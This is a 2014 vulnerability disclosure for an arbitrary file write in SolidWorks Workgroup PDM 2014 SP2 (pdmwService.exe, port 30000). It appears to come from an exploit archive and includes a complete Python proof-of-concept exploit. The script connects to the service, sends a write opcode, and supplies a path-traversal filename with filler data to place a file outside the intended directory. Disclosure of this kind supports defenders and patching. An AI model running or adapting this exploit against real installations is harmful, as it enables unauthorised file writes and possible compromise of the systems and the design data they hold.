SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write Vulnerability

'''

# Title: SolidWorks Workgroup PDM 2014 SP2 Arbitrary File Write Vulnerability

# Date: 2-21-2014

# Author: Mohamed Shetta

Email: mshetta |at| live |dot| com

# Vendor Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm

# Tested on: Windows 7

#Vulnerability type: Arbitrary File Write

#Vulnerable file: pdmwService.exe

#PORT: 30000

---------------------------------------------------------------------------------------------------------

Software Description:

SolidWorks

Workgroup PDM is a PDM tool that allows SolidWorks users operating in

teams of 10 members or less to work on designs concurrently. With

SolidWorks PDM Workgroup, designers can search, revise, and vault CAD

data while maintaining an accurate design history.

---------------------------------------------------------------------------------------------------------

Vulnerability Details:

This vulnerability allows remote attackers to write arbitrary file on vulnerable installations of SolidWorks Workgroup PDM.

------------------------------------------------------------------------------------------------------------

Disclosure timeline:

12/15/2013 - Vendor notified and no response.

2/21/2014 - Public disclosure

'''

#!/usr/bin/env python

import socket

import struct

import ctypes

FileName="\x2E\x00\x2E\x00\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x74\x00\x65\x00\x73\x00\x74\x00" #..\..\test

Data="A"*1028

FileSize=len(Data)

FNsz=len(FileName)

OpCode="\xD0\x07\x00\x00"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(("192.168.0.4", 30000))

s.send(OpCode)

s.send(struct.pack("I", FNsz))

s.send(FileName)

s.send(struct.pack('<Q', FileSize))

s.send(Data)